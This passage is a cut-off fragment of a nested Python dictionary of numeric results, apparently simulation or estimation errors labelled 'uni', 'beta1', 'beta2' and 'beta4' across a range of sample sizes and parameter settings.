100: {'uni': 0.41615600361788385, 'beta1': 0.26525536184211057, 'beta2': 1.079616181101069, 'beta4': [0.056515735143493694, 1.931223027967923]}, 75: {'uni': 0.5236506770132945, 'beta1': 0.4363272030509452, 'beta2': 0.8886165139035214, 'beta4': [0.07388529678184698, 2.1557067095437286]}, 50: {'uni': 0.6456493007017982, 'beta1': 0.2258459736242775, 'beta2': 0.9869185679088074, 'beta4': [0.07918643195511797, 1.769894900611441]}, 30: {'uni': 0.6312440269318761, 'beta1': 0.3874385917123824, 'beta2': 1.0616086354633982, 'beta4': [0.05954207845456959, 1.7604364861764141]}, 20: {'uni': 0.6104126181929235, 'beta1': 0.44559241884185424, 'beta2': 1.0365435872862463, 'beta4': [0.08444149538359204, 1.7089844645029653]}, 10: {'uni': 0.8451737140836733, 'beta1': 0.6917216817713429, 'beta2': 1.1455529117074295, 'beta4': [0.16205765465380548, 1.5093854292414484]}}, 20: {1000: {'uni': 0.8509864153912471, 'beta1': 0.5927515923267968, 'beta2': 1.354526814588536, 'beta4': [0.10563809568972533, 2.780136454569248]}, 750: {'uni': 0.7237563241854266, 'beta1': 0.4880530526732574, 'beta2': 1.3754270885330822, 'beta4': [0.11608747683938342, 2.3901377175273506]}, 500: {'uni': 0.7349098763088299, 'beta1': 0.77443020708596, 'beta2': 1.2995200030374383, 'beta4': [0.08306485481040625, 2.6259561040708594]}, 400: {'uni': 0.7638265439803422, 'beta1': 0.6462529311821992, 'beta2': 1.365105079340537, 'beta4': [0.0805276337368694, 2.9074523976944744]}, 300: {'uni': 0.6816219037194299, 'beta1': 0.9804111288462322, 'beta2': 1.3313766997426972, 'beta4': [0.10612186307108695, 2.3843697448899444]}, 200: {'uni': 0.5998893893985328, 'beta1': 0.5778379418103702, 'beta2': 1.396354902148294, 'beta4': [0.08999830370109724, 2.4110667278922406]}, 150: {'uni': 0.797984421533202, 'beta1': 0.7635119755558982, 'beta2': 1.187222514137199, 'beta4': [0.10856175212215503, 2.247413871208628]}, 100: {'uni': 0.8434139646946303, 'beta1': 0.5937542903575364, 'beta2': 1.6481711418029505, 'beta4': [0.10151763893978771, 2.2184136229062994]}, 75: {'uni': 0.7748853594262961, 'beta1': 0.664001314818624, 'beta2': 1.2569773830418571, 'beta4': [0.08736838782029115, 2.443966471445661]}, 50: {'uni': 0.6555728754658805, 'beta1': 0.9684915231136594, 'beta2': 1.2968657616883206, 'beta4': [0.10161338208896606, 2.182760554868553]}, 30: {'uni': 0.7083642351575556, 'beta1': 0.6515567893677615, 'beta2': 1.5238104034879336, 'beta4': [0.0947380293078371, 2.1689469958482914]}, 20: {'uni': 0.7698390858433307, 'beta1': 0.475054994726419, 'beta2': 1.2097144464959995, 'beta4': [0.1081789146585546, 1.9020833213197117]}, 10: {'uni': 0.7904674928158877, 'beta1': 0.949332463180755, 'beta2': 1.2485380080685293, 'beta4': [0.16929713985789144, 1.7918637142720673]}}, 10: {1000: {'uni': 2.020480490053906, 'beta1': 7.10721041709354, 'beta2': 2.5389968592417067, 'beta4': [0.18067848144370124, 4.323777699457079]}, 750: {'uni': 1.8352667947476462, 'beta1': 2.6434476210102633, 'beta2': 2.2530690225728245, 'beta4': [0.1947084612587166, 5.370382453225991]}, 500: {'uni': 3.4985999712865055, 'beta1': 2.6981020235784237, 'beta2': 2.7496782818831824, 'beta4': [0.17891534759810027, 4.506976439308247]}, 400: {'uni': 1.833890959291033, 'beta1': 3.4840986435598715, 'beta2': 2.6642714750900427, 'beta4': [0.2058070804280337, 6.517500096750502]}, 300: {'uni': 2.0147647645387217, 'beta1': 2.7229813555334967, 'beta2': 4.346111089370431, 'beta4': [0.1782410384933214, 4.701824532323007]}, 200: {'uni': 1.7663283518203157, 'beta1': 3.11879869260279, 'beta2': 2.540152495390496, 'beta4': [0.2166114012627128, 4.820017824394071]}, 150: {'uni': 2.0095640832399875, 'beta1': 2.9419595624093864, 'beta2': 2.724688157226053, 'beta4': [0.17215587940898358, 4.66355299910067]}, 100: {'uni': 2.4042834119544807, 'beta1': 2.352950768311206, 'beta2': 2.2814604833627694, 'beta4': [0.18527457231348213, 4.377326443901522]}, 75: {'uni': 2.716863274826222, 'beta1': 4.822313759516299, 'beta2': 2.6674769462538004, 'beta4': [0.21543589699842206, 4.108384140007609]}, 50: {'uni': 2.2468730444488623, 'beta1': 3.483152730839255, 'beta2': 2.568146356363349, 'beta4': [0.16002210596292038, 5.625984340312313]}, 30: {'uni': 2.3701381561805053, 'beta1': 3.3219273109798197, 'beta2': 3.9081160898211027, 'beta4': [0.21947288024784048, 3.484919952253338]}, 20: {'uni': 2.106479401491252, 'beta1': 3.476826223442542, 'beta2': 2.6443039958807697, 'beta4': [0.1931791291006743, 3.2904139525762433]}, 10: {'uni': 1.7163313859785951, 'beta1': 3.4176017442346387, 'beta2': 2.1443609804377814, 'beta4': [0.202020846365801, 3.0372515442974857]}}}, 0.005: {1000: {1000: {'uni': 0.014328099280717366, 'beta1': 0.0004919534897684268, 'beta2': 0.26507968432654655, 'beta4': [0.001982857431591232, 1.071207340663885]}, 750: {'uni': 0.014645931102658792, 'beta1': 0.0004516767324158777, 'beta2': 0.28135025385035284, 'beta4': [0.0023819938907576168, 1.0710979644235907]}, 500: {'uni': 0.0401999123504932, 'beta1': 0.0010098622206039503, 'beta2': 0.26087040771294423, 'beta4': [0.00391322292956706, 1.0602707743351634]}, 400: {'uni': 0.03859906062661561, 'beta1': 0.0023951491974352618, 'beta2': 0.325410845646177, 'beta4': [0.00431194717597686, 1.0539406068541854]}, 300: {'uni': 0.03961135602832819, 'beta1': 0.004463024128966381, 'beta2': 0.30654953459515155, 'beta4': [0.005887885874932361, 1.0495105539340337]}, 200: {'uni': 0.05328322862904386, 'beta1': 0.00695816954383936, 'beta2': 0.3584887819400396, 'beta4': [0.010031906426799495, 1.0394763617108735]}, 150: {'uni': 0.07991070685839313, 'beta1': 0.01096956639776533, 'beta2': 0.38432269776431915, 'beta4': [0.014212643491827315, 1.035714483334916]}, 100: {'uni': 0.11547898783798272, 'beta1': 0.024911803431916877, 'beta2': 0.4413911056397121, 'beta4': [0.020223936999933474, 1.0295365432573114]}, 75: {'uni': 0.14278860827610332, 'beta1': 0.04111931346005935, 'beta2': 0.48247323124440955, 'beta4': [0.024508730748380864, 1.028521101035791]}, 50: {'uni': 0.22244005356502672, 'beta1': 0.10076678543802904, 'beta2': 0.53887818521626, 'beta4': [0.04406731062769291, 1.0253494243999786]}, 30: {'uni': 0.3457199293022066, 'beta1': 0.18111907291977847, 'beta2': 0.6489180152254685, 'beta4': [0.06329946927410347, 1.0186691429238954]}, 20: {'uni': 0.4321639624206314, 'beta1': 0.31930093433284834, 'beta2': 0.6968358057547454, 'beta4': [0.08748917387005273, 1.0148628000802158]}, 10: {'uni': 0.7535607617244571, 'beta1': 0.6459185759652024, 'beta2': 0.8404608212786704, 'beta4': [0.14874100748788613, 1.0103627959113197]}}, 750: {1000: {'uni': 0.016054643834592864, 'beta1': 0.0005255210796136057, 'beta2': 0.29613016022578065, 'beta4': [0.002569321458361536, 1.0921977757609453]}, 750: {'uni': 0.017565449609493463, 'beta1': 0.00044128146494429657, 'beta2': 0.32596319569610427, 'beta4': [0.0024211193229798614, 1.0837247325988582]}, 500: {'uni': 0.025273388585714537, 'beta1': 0.0012238909965949832, 'beta2': 0.28596633888810613, 'beta4': [0.004706891079404562, 1.0763363258243404]}, 400: {'uni': 0.0284869706662805, 'beta1': 0.003373431089387849, 'beta2': 0.31160773879605275, 'beta4': [0.004778217415687074, 1.0688815827153706]}, 300: {'uni': 0.051974911880818334, 'beta1': 0.0025953674653235816, 'beta2': 0.35487660596973497, 'beta4': [0.0057040189841521954, 1.0645206895209334]}, 200: {'uni': 0.057787227888696155, 'beta1': 0.008594698361171204, 'beta2': 0.33464364516433065, 'beta4': [0.008915943193690542, 1.058535030341485]}, 150: {'uni': 0.1072577046248855, 'beta1': 0.008954930631785816, 'beta2': 0.3547962531903187, 'beta4': [0.014926190566390659, 1.0451050889459255]}, 100: {'uni': 0.10866795713543598, 'beta1': 0.021365150417910553, 'beta2': 0.408057891802109, 'beta4': [0.01995689778854479, 1.0427691805903552]}, 75: {'uni': 0.1515930948295423, 'beta1': 0.0471416864069456, 'beta2': 0.4622290961298072, 'beta4': [0.033113111249531646, 1.0347147013802995]}, 50: {'uni': 0.22238209797127031, 'beta1': 0.09411440367183642, 'beta2': 0.5492704161662795, 'beta4': [0.04003882098404763, 1.03710679974761]}, 30: {'uni': 0.36495749036912684, 'beta1': 0.20588432683378366, 'beta2': 0.63948653203891, 'beta4': [0.053653553378636976, 1.0243617060340924]}, 20: {'uni': 0.4884959323661349, 'beta1': 0.30666472361293534, 'beta2': 0.7081435215673421, 'beta4': [0.07540684280791501, 1.020569046057047]}, 10: {'uni': 0.6968386619986449, 'beta1': 0.6811799241679843, 'beta2': 0.8553586319565165, 'beta4': [0.15249709600683814, 1.0142223850662149]}}, 500: {1000: {'uni': 0.02390920295425466, 'beta1': 0.0010562525829358833, 'beta2': 0.28768678189795666, 'beta4': [0.004312024387535537, 1.1489861120864775]}, 750: {'uni': 0.02364967452116205, 'beta1': 0.0013663794051884156, 'beta2': 0.3059833791245982, 'beta4': [0.0037397623064582357, 1.125354161378425]}, 500: {'uni': 0.027171446923213848, 'beta1': 0.0014895968977017358, 'beta2': 0.32175550025195343, 'beta4': [0.004058092086363399, 1.1107301691353542]}, 400: {'uni': 0.03183194238950928, 'beta1': 0.0020434543150262266, 'beta2': 0.31271219509470577, 'beta4': [0.004795694763576324, 1.1285307153481872]}, 300: {'uni': 0.03915870533550215, 'beta1': 0.002891114208307802, 'beta2': 0.3374659826961455, 'beta4': [0.009481642046035186, 1.1000575313033538]}, 200: {'uni': 0.05918013749289809, 'beta1': 0.00571396543076984, 'beta2': 0.3642424794285678, 'beta4': [0.008165969887847468, 1.0779103780685995]}, 150: {'uni': 0.08913468389043425, 'beta1': 0.013857796694830497, 'beta2': 0.36670305795462654, 'beta4': [0.013510229542809978, 1.0704422729330318]}, 100: {'uni': 0.10962684237002224, 'beta1': 0.025601470186866964, 'beta2': 0.41964378122965873, 'beta4': [0.02140079956143495, 1.0615497788178276]}, 75: {'uni': 0.16410321919833215, 'beta1': 0.036565104170381946, 'beta2': 0.4483370318574912, 'beta4': [0.025341038030251152, 1.0519482474243165]}, 50: {'uni': 0.23214158365024107, 'beta1': 0.07759808681388385, 'beta2': 0.5409699810844546, 'beta4': [0.03698440051989314, 1.045002808918023]}, 30: {'uni': 0.36866261035341547, 'beta1': 0.1615745284530632, 'beta2': 0.6000774443252743, 'beta4': [0.06503567790681813, 1.036549927349429]}, 20: {'uni': 0.5142807096062043, 'beta1': 0.3709377892635338, 'beta2': 0.6687577103009485, 'beta4': [0.09190174832036048, 1.0294336844120058]}, 10: {'uni': 0.6676276934998603, 'beta1': 0.6031823674458175, 'beta2': 0.8504156545798995, 'beta4': [0.15410271127453445, 1.0248849403515385]}}, 400: {1000: {'uni': 0.02893756653890583, 'beta1': 0.0024708098532196816, 'beta2': 0.35317007637931086, 'beta4': [0.005840162737584066, 1.1458782759009223]}, 750: {'uni': 0.029772953579492705, 'beta1': 0.0025813101021306246, 'beta2': 0.33581836617716804, 'beta4': [0.00515663755940367, 1.1544432713432045]}, 500: {'uni': 0.026373683744683594, 'beta1': 0.0012817539679130607, 'beta2': 0.3206528709629913, 'beta4': [0.006340143273613668, 1.1259949309060133]}, 400: {'uni': 0.028870605255494165, 'beta1': 0.0017583836928871455, 'beta2': 0.3345485197465399, 'beta4': [0.0049145410619623065, 1.1313262140962277]}, 300: {'uni': 0.037631574659545766, 'beta1': 0.003314104667762801, 'beta2': 0.3739031457830798, 'beta4': [0.006628311781369157, 1.1244848630571982]}, 200: {'uni': 0.05818960792147371, 'beta1': 0.006414447500778574, 'beta2': 0.34785104123458455, 'beta4': [0.010347124650326254, 1.1055988963642294]}, 150: {'uni': 0.06686629124379927, 'beta1': 0.010473443536135857, 'beta2': 0.3711187401000779, 'beta4': [0.01737674940997798, 1.0894763594747867]}, 100: {'uni': 0.11042615577766349, 'beta1': 0.021440842781902242, 'beta2': 0.4194431482280291, 'beta4': [0.020167807881497756, 1.0720999951903198]}, 75: {'uni': 0.17234535024501574, 'beta1': 0.04888178853521142, 'beta2': 0.44258791900978556, 'beta4': [0.024666584013382783, 1.0724976966026734]}, 50: {'uni': 0.20747390135121996, 'beta1': 0.10412610029786912, 'beta2': 0.5214455501618365, 'beta4': [0.03647333118409969, 1.054845362239509]}, 30: {'uni': 0.323080761682041, 'beta1': 0.1910703286553347, 'beta2': 0.5895460490280188, 'beta4': [0.07318268072463806, 1.047335158479478]}, 20: {'uni': 0.425104439432341, 'beta1': 0.31288400955871687, 'beta2': 0.660810228645866, 'beta4': [0.09528909385922078, 1.0367863357961702]}, 10: {'uni': 0.7978419703610078, 'beta1': 0.6535599792905803, 'beta2': 0.8606946260002006, 'beta4': [0.1559615213065441, 1.0262921049491547]}}, 300: {1000: {'uni': 0.03617128520734348, 'beta1': 0.005295932115668975, 'beta2': 0.3953652729378721, 'beta4': [0.0077996963164763365, 1.198423568016775]}, 750: {'uni': 0.03370212655005886, 'beta1': 0.003406479786029501, 'beta2': 0.33283985486640805, 'beta4': [0.006246338063993741, 1.1688992556321924]}, 500: {'uni': 0.03733598381117172, 'beta1': 0.002690213582744608, 'beta2': 0.32679970881106063, 'beta4': [0.0072746227056809725, 1.1815977716399453]}, 400: {'uni': 0.037609473359047664, 'beta1': 0.0030367027449007575, 'beta2': 0.31301244809282824, 'beta4': [0.007004909388070732, 1.1535355373438279]}, 300: {'uni': 0.04866436408185673, 'beta1': 0.005036968714659069, 'beta2': 0.39337778376104543, 'beta4': [0.006593818546016198, 1.1471357754823057]}, 200: {'uni': 0.06691519284441158, 'beta1': 0.012088429889848653, 'beta2': 0.411545693440886, 'beta4': [0.00925915149648542, 1.1467683642662987]}, 150: {'uni': 0.08013870806087241, 'beta1': 0.012928591505765686, 'beta2': 0.3639915988699613, 'beta4': [0.013545098748925637, 1.112941475607728]}, 100: {'uni': 0.11915204806596211, 'beta1': 0.020560796608724338, 'beta2': 0.43513333320171427, 'beta4': [0.024870502434082297, 1.101010773135631]}, 75: {'uni': 0.15380764367109265, 'beta1': 0.052743721971365606, 'beta2': 0.477437577043614, 'beta4': [0.025753188654213978, 1.096656178793653]}, 50: {'uni': 0.21634860989228755, 'beta1': 0.10387426914262873, 'beta2': 0.5267676741342504, 'beta4': [0.0336359638147702, 1.0756656338476558]}, 30: {'uni': 0.329104913600056, 'beta1': 0.2119333657379465, 'beta2': 0.5795669522760784, 'beta4': [0.05880821427631558, 1.0573282739845435]}, 20: {'uni': 0.4440546212288396, 'beta1': 0.33225105400565214, 'beta2': 0.7033791372197638, 'beta4': [0.09446679633215929, 1.0452682420079284]}, 10: {'uni': 0.6700468460734627, 'beta1': 0.6423991037463385, 'beta2': 0.8209898707066139, 'beta4': [0.14614716121509172, 1.0368350386240601]}}, 200: {1000: {'uni': 0.055678760865024414, 'beta1': 0.007958611327107352, 'beta2': 0.3616812080853317, 'beta4': [0.009650760728049683, 1.2737715811614496]}, 750: {'uni': 0.06253429328064883, 'beta1': 0.007052014486479158, 'beta2': 0.3727602445915611, 'beta4': [0.013907566868759703, 1.2455156544743298]}, 500: {'uni': 0.056629728333709814, 'beta1': 0.007236990383308722, 'beta2': 0.4378412955709138, 'beta4': [0.008915720861055711, 1.2396638343497217]}, 400: {'uni': 0.06557818408133465, 'beta1': 0.008559725754195417, 'beta2': 0.4022416830536871, 'beta4': [0.008720624487697483, 1.2242496161641432]}, 300: {'uni': 0.055653765135356484, 'beta1': 0.010716858079046102, 'beta2': 0.40777043770500154, 'beta4': [0.013037868268656936, 1.1945048646946044]}, 200: {'uni': 0.07406809444327488, 'beta1': 0.00871994028403354, 'beta2': 0.43397543608537975, 'beta4': [0.010133665874696609, 1.183136623171022]}, 150: {'uni': 0.07579453587538967, 'beta1': 0.016690794496607576, 'beta2': 0.38707637478822926, 'beta4': [0.012003777291769832, 1.1607492057108946]}, 100: {'uni': 0.1330117692754952, 'beta1': 0.0273137396681669, 'beta2': 0.4639958863729501, 'beta4': [0.01718866277831865, 1.1529289387642288]}, 75: {'uni': 0.16284219430179553, 'beta1': 0.05374597722028761, 'beta2': 0.46276207823889204, 'beta4': [0.0212354062721255, 1.1433215554102738]}, 50: {'uni': 0.21676977749720733, 'beta1': 0.10705646819292171, 'beta2': 0.4962386395407797, 'beta4': [0.0424490148625437, 1.106642687778397]}, 30: {'uni': 0.3232291639799789, 'beta1': 0.21990639926403363, 'beta2': 0.6287500118287891, 'beta4': [0.06227333917623599, 1.0852347913639224]}, 20: {'uni': 0.4741588995975893, 'beta1': 0.3180055211757256, 'beta2': 0.6997497503888488, 'beta4': [0.08910550204088843, 1.073553657215182]}, 10: {'uni': 0.7060034832794384, 'beta1': 0.7535719832598702, 'beta2': 0.836970960678481, 'beta4': [0.15463124862968708, 1.061123889701544]}}, 150: {1000: {'uni': 0.09755029708902496, 'beta1': 0.013371380424273176, 'beta2': 0.4904883791446505, 'beta4': [0.014485120313771681, 1.3263298856392054]}, 750: {'uni': 0.07935627239599896, 'beta1': 0.014498726584143962, 'beta2': 0.4032213903162674, 'beta4': [0.01453548924940545, 1.312319935889472]}, 500: {'uni': 0.07940335531678129, 'beta1': 0.013532193951838856, 'beta2': 0.43737767914012077, 'beta4': [0.012086410300407132, 1.292089639338192]}, 400: {'uni': 0.08510558470918518, 'beta1': 0.013814146505550512, 'beta2': 0.4322597292778953, 'beta4': [0.011514722775333443, 1.2679672672520583]}, 300: {'uni': 0.07050546141892267, 'beta1': 0.013721651466435995, 'beta2': 0.4772443440959037, 'beta4': [0.013048563921660452, 1.275168506879035]}, 200: {'uni': 0.07212522306921464, 'beta1': 0.014794794920315857, 'beta2': 0.4182389641782459, 'beta4': [0.012330051449758477, 1.223055546001289]}, 150: {'uni': 0.0880530466181019, 'beta1': 0.01637038391386567, 'beta2': 0.4016620386283008, 'beta4': [0.015981031730102176, 1.2058441135701794]}, 100: {'uni': 0.10437092139348636, 'beta1': 0.042125959393999324, 'beta2': 0.4180395651716391, 'beta4': [0.018238525075653742, 1.1892200376979478]}, 75: {'uni': 0.1354097789470845, 'beta1': 0.04466340448885708, 'beta2': 0.4719502510414126, 'beta4': [0.029031453045082974, 1.1842822424503554]}, 50: {'uni': 0.2321223950706905, 'beta1': 0.1000673436975513, 'beta2': 0.5419923580903283, 'beta4': [0.04560941534187873, 1.1404594681712081]}, 30: {'uni': 0.3398043685756915, 'beta1': 0.20164768345364828, 'beta2': 0.5973341709232525, 'beta4': [0.05850641234359622, 1.1190533719391869]}, 20: {'uni': 0.42530652623250753, 'beta1': 0.33972887071420993, 'beta2': 0.6661734761601139, 'beta4': [0.0866818884666435, 1.1036146702573584]}, 10: {'uni': 0.7206486942031576, 'beta1': 0.6682818489256517, 'beta2': 0.8203819752573837, 'beta4': [0.1457856061570244, 1.0782841756806698]}}, 100: {1000: {'uni': 0.12225970876711711, 'beta1': 0.026865924786776484, 'beta2': 0.5481932843224591, 'beta4': [0.021249975024392645, 1.4458803198625023]}, 750: {'uni': 0.10432288378851975, 'beta1': 0.01938410759360099, 'beta2': 0.5174008910203534, 'beta4': [0.020650675251219643, 1.400096753320331]}, 500: {'uni': 0.10980786444942221, 'beta1': 0.046045147980126745, 'beta2': 0.4872619282673519, 'beta4': [0.020216014505271482, 1.34415766866211]}, 400: {'uni': 0.11830943122090917, 'beta1': 0.022610702506398205, 'beta2': 0.48432204455605576, 'beta4': [0.020746831022585423, 1.3579130782794564]}, 300: {'uni': 0.1301564606268183, 'beta1': 0.03017686908257779, 'beta2': 0.49504127235180784, 'beta4': [0.017718462476249502, 1.3626289526025477]}, 200: {'uni': 0.10317650157447253, 'beta1': 0.031018838197086084, 'beta2': 0.5827841182143911, 'beta4': [0.01835643401415011, 1.3438136723439953]}, 150: {'uni': 0.1223846100192758, 'beta1': 0.029879335127678274, 'beta2': 0.5409671366968559, 'beta4': [0.01954089865119265, 1.368437090606529]}, 100: {'uni': 0.12961477120291165, 'beta1': 0.03162701397748519, 'beta2': 0.5639520142257836, 'beta4': [0.017002122681775672, 1.3145981538380391]}, 75: {'uni': 0.17353671304347995, 'beta1': 0.047537565730464616, 'beta2': 0.5761043512638573, 'beta4': [0.027716532256132305, 1.2441854959216505]}, 50: {'uni': 0.24826276887242338, 'beta1': 0.08558962844244324, 'beta2': 0.533915471627432, 'beta4': [0.03863914801170205, 1.218517497159898]}, 30: {'uni': 0.37180952980211535, 'beta1': 0.21095614373881763, 'beta2': 0.6001047101242712, 'beta4': [0.055670631983699946, 1.2205675047970168]}, 20: {'uni': 0.5332463734790038, 'beta1': 0.3122699052968921, 'beta2': 0.6825479362346901, 'beta4': [0.1007635027564815, 1.1578526542019671]}, 10: {'uni': 0.7827438334815844, 'beta1': 0.667689009954351, 'beta2': 0.8475596342444666, 'beta4': [0.14486763242884407, 1.141064060957981]}}, 75: {1000: {'uni': 0.13934776917850505, 'beta1': 0.03613172510974446, 'beta2': 0.5412943561883247, 'beta4': [0.027239243280109772, 1.4730726636218179]}, 750: {'uni': 0.16768552393257194, 'beta1': 0.04411635102462327, 'beta2': 0.5665863137587445, 'beta4': [0.026435978717218058, 1.50426942823365]}, 500: {'uni': 0.24455944319130382, 'beta1': 0.05406680626221278, 'beta2': 0.5394359340277001, 'beta4': [0.027135290145289204, 1.5051667579504118]}, 400: {'uni': 0.15461074078236603, 'beta1': 0.05661127214288521, 'beta2': 0.5887256535284988, 'beta4': [0.03600603252919621, 1.478513973879563]}, 300: {'uni': 0.1920855608409181, 'beta1': 0.03925990146874738, 'beta2': 0.630763663206618, 'beta4': [0.025894458672085747, 1.4794655207279226]}, 200: {'uni': 0.1591107285954601, 'beta1': 0.04254459738815162, 'beta2': 0.6307198306870676, 'beta4': [0.02985877018033198, 1.530765493767434]}, 150: {'uni': 0.14590438734222005, 'beta1': 0.04466619164761486, 'beta2': 0.6173909230664805, 'beta4': [0.026438835998575785, 1.5522769250395467]}, 100: {'uni': 0.16386720848409753, 'beta1': 0.034581214946180605, 'beta2': 0.6435260478502861, 'beta4': [0.02156809827287651, 1.3310952312116713]}, 75: {'uni': 0.2051974936490455, 'beta1': 0.04438683443429087, 'beta2': 0.7570265710330468, 'beta4': [0.02519624884405606, 1.3151982531497861]}, 50: {'uni': 0.24755928104164165, 'beta1': 0.07941075920923452, 'beta2': 0.5523721622394626, 'beta4': [0.032146481769480144, 1.3112402606407734]}, 30: {'uni': 0.31261585515906276, 'beta1': 0.18074582175361859, 'beta2': 0.7859291996037391, 'beta4': [0.06990167942655667, 1.2489639807507744]}, 20: {'uni': 0.47757757711804133, 'beta1': 0.3892655220378294, 'beta2': 0.65429188208398, 'beta4': [0.07124185190053445, 1.20898602562413]}, 10: {'uni': 0.758938135412502, 'beta1': 0.6071917038027647, 'beta2': 0.8133960727391841, 'beta4': [0.1418543707432124, 1.172110809011133]}}, 50: {1000: {'uni': 0.2519872356069227, 'beta1': 0.09956789513840078, 'beta2': 0.5973602366915676, 'beta4': [0.03557118792760849, 1.846420958350958]}, 750: {'uni': 0.22274951858723938, 'beta1': 0.14482781845510667, 'beta2': 0.6178955775749804, 'beta4': [0.03823593411101681, 1.6198382539682874]}, 500: {'uni': 0.28071600405504815, 'beta1': 0.09158498231032232, 'beta2': 0.7997535279942787, 'beta4': [0.04163171710115897, 1.650963554921299]}, 400: {'uni': 0.2922089526616882, 'beta1': 0.11759396626445189, 'beta2': 0.7731995739049791, 'beta4': [0.037647902544816, 1.7656229411142739]}, 300: {'uni': 0.25418399430527083, 'beta1': 0.13751569298349953, 'beta2': 0.7573774424984173, 'beta4': [0.05931918746259869, 1.7791282172821952]}, 200: {'uni': 0.23531715081630106, 'beta1': 0.11068962000304736, 'beta2': 0.6622845585879117, 'beta4': [0.03585546142253086, 1.6847743436735174]}, 150: {'uni': 0.2571656578305455, 'beta1': 0.0990487380070637, 'beta2': 0.9408378093466124, 'beta4': [0.04508196722079799, 1.6238817123606337]}, 100: {'uni': 0.30195245498224216, 'beta1': 0.12530632794125562, 'beta2': 0.791776346980489, 'beta4': [0.03925044382813762, 1.4734408851271226]}, 75: {'uni': 0.22035812392432402, 'beta1': 0.07800979369300794, 'beta2': 0.842860198671106, 'beta4': [0.03637344064264452, 1.549853109016985]}, 50: {'uni': 0.22701572090938457, 'beta1': 0.09633906028439704, 'beta2': 0.7417429467761041, 'beta4': [0.03967152130862653, 1.4208398087842706]}, 30: {'uni': 0.34305046792602056, 'beta1': 0.19457807203493765, 'beta2': 0.7688470256335644, 'beta4': [0.054957912588768955, 1.360607831613779]}, 20: {'uni': 0.44028196804498093, 'beta1': 0.3293466137962002, 'beta2': 0.8955070612796764, 'beta4': [0.08742726496427163, 1.3095948825783168]}, 10: {'uni': 0.7699134066893929, 'beta1': 0.6638012059398908, 'beta2': 0.8293763559338202, 'beta4': [0.16302206868052743, 1.255835042638528]}}, 30: {1000: {'uni': 0.3783603182203987, 'beta1': 0.2985135916574845, 'beta2': 0.8480133889666746, 'beta4': [0.07400878504174886, 1.8720458507484417]}, 750: {'uni': 0.4154933226222209, 'beta1': 0.24934139997421964, 'beta2': 1.160778307881534, 'beta4': [0.07685054947159019, 2.044210757725545]}, 500: {'uni': 0.550909588495024, 'beta1': 0.2313146347432924, 'beta2': 0.936385734064073, 'beta4': [0.07048754696750378, 1.9792386217682503]}, 400: {'uni': 0.5076547857886943, 'beta1': 0.32364070076843526, 'beta2': 0.828794665169518, 'beta4': [0.05552868809465391, 2.13369982878608]}, 300: {'uni': 0.4212091415576435, 'beta1': 0.6407736056430736, 'beta2': 1.0918478367941438, 'beta4': [0.06705773137193753, 2.183556190312245]}, 200: {'uni': 0.5222535142935859, 'beta1': 0.25665396488998615, 'beta2': 0.9107840939614209, 'beta4': [0.06654571092334242, 1.805631337994444]}, 150: {'uni': 0.43316941974778084, 'beta1': 0.20792026635549665, 'beta2': 0.9315624660996159, 'beta4': [0.08392298669805384, 1.8279786709160393]}, 100: {'uni': 0.4390903940116475, 'beta1': 0.23112811858430285, 'beta2': 1.1529115982571578, 'beta4': [0.06978068315817124, 1.991075733195905]}, 75: {'uni': 0.4108132941809196, 'beta1': 0.3623491730750028, 'beta2': 0.987753882594803, 'beta4': [0.06674754238444675, 1.840030509070244]}, 50: {'uni': 0.43236438562108004, 'beta1': 0.26646388556150524, 'beta2': 1.1050012918364582, 'beta4': [0.07546899560971876, 1.7970124808313264]}, 30: {'uni': 0.48845354994614554, 'beta1': 0.2512856894263626, 'beta2': 1.0020051752860113, 'beta4': [0.05853483814283524, 1.6209383322431605]}, 20: {'uni': 0.46205240371135886, 'beta1': 0.33039091692066247, 'beta2': 0.8763727543362038, 'beta4': [0.08506956671611077, 1.6253602089503376]}, 10: {'uni': 0.7376491727942917, 'beta1': 0.701426624157432, 'beta2': 1.0318845897107891, 'beta4': [0.16199617337961164, 1.4429581649223886]}}, 20: {1000: {'uni': 0.8019976350067, 'beta1': 0.8332259715318519, 'beta2': 1.1366607302655636, 'beta4': [0.08995158287931063, 2.523474384380298]}, 750: {'uni': 0.8240765825127023, 'beta1': 0.6078699965037111, 'beta2': 1.3066093350540289, 'beta4': [0.09399747363931381, 2.5986801791624394]}, 500: {'uni': 0.9974083513430438, 'beta1': 0.5023448507895341, 'beta2': 1.5764142648731303, 'beta4': [0.08892101043100277, 2.4498259406795078]}, 400: {'uni': 0.65987087499712, 'beta1': 1.0021947304857353, 'beta2': 1.0133412632320413, 'beta4': [0.09297169783242988, 2.203514161015423]}, 300: {'uni': 0.8346407450005573, 'beta1': 0.4858229844832691, 'beta2': 1.7026411990816142, 'beta4': [0.09176193095098974, 2.4706819211929543]}, 200: {'uni': 0.6097035714025173, 'beta1': 0.5346254040464333, 'beta2': 1.316817789777299, 'beta4': [0.09682457806892368, 2.242178483680891]}, 150: {'uni': 0.7118891887622544, 'beta1': 0.73757966982389, 'beta2': 1.756042304492378, 'beta4': [0.09424018725867234, 2.456661404213161]}, 100: {'uni': 0.7037802965100136, 'beta1': 1.3606834631757059, 'beta2': 1.3043054700351289, 'beta4': [0.10217585159933665, 2.3827792567388353]}, 75: {'uni': 0.8055662843703303, 'beta1': 0.46287340020535195, 'beta2': 1.2503612065373881, 'beta4': [0.10490481871712838, 2.816915331499867]}, 50: {'uni': 0.8246742261483321, 'beta1': 0.6187824029797957, 'beta2': 1.3150729181082033, 'beta4': [0.08275958000501926, 2.42227261187819]}, 30: {'uni': 0.6868898977184308, 'beta1': 0.40962747269539135, 'beta2': 1.3439023117013336, 'beta4': [0.10164499360892393, 1.9097766052880618]}, 20: {'uni': 0.554678594337485, 'beta1': 0.5266918425509246, 'beta2': 1.3548613513588386, 'beta4': [0.10398481149694526, 1.9876903951414775]}, 10: {'uni': 1.0446131131368517, 'beta1': 0.7747696875546464, 'beta2': 1.8108754189944798, 'beta4': [0.15817077417264236, 1.7127206843317608]}}, 10: {1000: {'uni': 1.6849860990985794, 'beta1': 2.7439137403319105, 'beta2': 2.734111069331994, 'beta4': [0.18923271560035437, 5.02925901860904]}, 750: {'uni': 1.830761737169992, 'beta1': 2.5751354681579217, 'beta2': 2.663574129357734, 'beta4': [0.16303669261193782, 3.6181870370037714]}, 500: {'uni': 3.2685644351081553, 'beta1': 2.497162317342663, 'beta2': 3.831873093092898, 'beta4': [0.19152027457838408, 5.277460841781809]}, 400: {'uni': 1.8175906273340954, 'beta1': 5.798628259006607, 'beta2': 2.265996141562548, 'beta4': [0.18666272909519135, 4.311034510201182]}, 300: {'uni': 1.752330482850812, 'beta1': 2.446640937487978, 'beta2': 3.156170480487465, 